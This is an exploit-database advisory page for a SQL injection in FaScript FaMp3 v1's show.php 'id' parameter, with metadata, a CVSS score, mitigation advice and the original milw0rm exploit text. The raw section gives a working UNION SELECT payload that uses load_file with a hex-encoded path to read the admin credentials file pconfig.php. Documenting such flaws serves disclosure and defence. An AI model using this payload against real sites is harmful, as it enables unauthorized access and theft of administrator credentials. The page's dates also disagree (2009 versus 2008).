FaScript FaMp3 v1 Remote Sql Injection

vendor:

FaMp3

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: FaMp3

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:fascript:famp3:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

FaScript FaMp3 v1 Remote Sql Injection

A vulnerability exists in FaScript FaMp3 v1, which allows an attacker to inject arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'show.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. This can allow the attacker to gain access to the admin username and password stored in the 'pconfig.php' file.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, the application should use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

#####################################################################################
####               FaScript FaMp3 v1 Remote Sql Injection                        ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.fascript.com/persian.rar                              #
#                                                                                   #
#Injection Adress :  http://127.0.0.1/famp3/show.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]